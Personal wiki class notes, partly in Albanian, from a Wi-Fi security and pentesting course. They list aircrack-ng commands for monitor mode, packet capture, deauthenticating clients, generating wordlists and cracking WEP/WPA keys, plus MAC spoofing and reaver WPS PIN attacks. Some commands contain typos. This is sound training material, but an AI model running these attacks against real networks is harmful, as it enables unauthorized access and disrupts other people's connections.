dardan:cyberacademy:module-5-wifi_security_and_pentesting
##########################################################################################
23.07.2018, module-5 Day 1
https://www.youtube.com/watch?v=7HTfUUzdmEk
802.11a,b,g,n
ranges for a b g n
ssid: ap name
bssid: MAC address of the wireless access point
Aircrack-ng toolkit
airmon-ng --na mundeson int me qit ne monitor mode
airdump-ng --me pa krejt AP e te dhenat e tyre i run me ni file
airplay-ng --i disconnect edhe i detyron mu ri connect qe mi nxon handshake
aircrack-ng --me crackirat passwin
airmon-ng
airmon-ng check kill
airmon-ng start wlan0
airodump-ng wlan0mon
airodum-ng --channel 6 --write capFiles --bssid interfce name
aireplay-ng -9 wlan0mon
crunch 5 5 0123456789 > filelist.txt --me gjeneru worldlista
aircrack-ng -b bssid mac -w worldlist.txt CybHack-01.cap
ifconfig | grep flags | cut -d " " -f 1 | tr -d ":"
ifconfig | grep "init\b" | cut -d " " -f 10
=====Arbeni cracking wep
Grep interface ip's:
ifconfig | grep "inet\b" | cut -d " " -f 10
Grep specific interface ip:
ifconfig eth0 | grep "inet\b" | cut -d " " -f 10
or
ifconfig eth0 | grep "inet\b" | awk '{print $2}'
Grep interface name:
ifconfig | grep flags | cut -d " " -f 1 | tr -d ":"
---------------------------------------------------------
1)
airmon-ng check kill - (to kill processes that are in conflict with aircrack-ng suite)
airmon-ng - (to see which interfaces are available)
airmon-ng start wlan0 - (to start wlan0 in monitoring mode)
2)
airodump-ng wlan0mon - (to see AP's and their prefrences)
airodump-ng --bssid <Wifi Macaddress(BSSID)> --channel <nr> --write <CapturedFiles> wlan0mon
..wait for enough beacons
3) aircrack-ng -b <WifiMacaddress(BSSID)> CapturedFiles-01.cap
Cracked!
5) airmon-ng stop wlan0mon
6) service network-manager restart
########################################################################################## 25.07.2018, module-5 Day 2 beacons --frames qe permbajn network informations ifconfig eth0 iwconfig $/proc/sys/net/ipv4# cat icmp_echo_ignore_all /etc/sysctl.conf net.ipv4.icmp_echo_ignore_all = 1 # sysctl -p --restart #cat /proc/sys/net/ipv4/icmp_echo_ignore_all --to confirm iwlist wlan0 scanning --active scanning airdump-ng --pactive scanning auth mode: open wep --limited password length wpa1, 2, 3 tx rx error --error on packets dropped --kur ka buffer overflow carrier --sa her eshte humb sinjali, zakonisht kabell problem collisios -- ne hub enviroment csma/cd csma/ca full duplex - lan half duplex - toki woki simplex -- tv wireless works - full duplex airodump-ng wlan0mon --clients connected macchanger etho -r --rendom mac change macchanger etho -m xx:xx:xx:xx:xx:xx eth0 initiate de auth packets to deactivate clients than essid will be shown when clients start to connect ----------------------------------- airmon-ng check kill airmon-ng airmon-ng start wan0 ifconfig -- del eminr e bon wlan0mon airodump-ng wlan0mon airmon-ng --bssid xx:xxx:xx:xx --channel 11 --write wifisecurity.txt wlan0mon airodump-ng wlan0mon aireplay-ng --deauth 1 -c xx:Xxx:xx:xx -a cc:cc:cc::c:;c:;c wlan0mon aircrack-ng -w /worldlist path.txt capture file.cap
.########################################################################################## 27.07.2018, module-5 Day 3 munges
.########################################################################################## 30.07.2018, module-5 Day 4 munges
.########################################################################################## 01.08.2018, module-5 Day 5 munges
.########################################################################################## 03.08.2018, module-5 Day 6 munges
.########################################################################################## 06.08.2018, module-5 Day 7 pushim
.########################################################################################## 08.08.2018, module-5 Day 8 pushim
.########################################################################################## 10.08.2018, module-5 Day 9 pushim
.########################################################################################## 13.08.2018, module-5 Day 10 -crack an AP -worldlist me passworda te wifi head -n 10 ipko.txt | cut -c 1,3,9
.########################################################################################## 15.08.2018, module-5 Day 11 monitoring interfaces layered security imortant for wireless security
########################################################################################## 17.08.2018, module-5 Day 12 Target 2.96 iceberg version
########################################################################################## 20.08.2018, module-5 Day 13 munges wps wash --ignore-fcs -i "interface" reaver -i "interface" -b "BSSID" -vv reaver -i "interface" -b "BSSID" -vv -p "PIN"
########################################################################################## 22.08.2018, module-5 Day 14 pined based attack reaver
dardan/cyberacademy/module-5-wifi_security_and_pentesting.txt · Last modified: 2018/08/22 17:29 by dardan
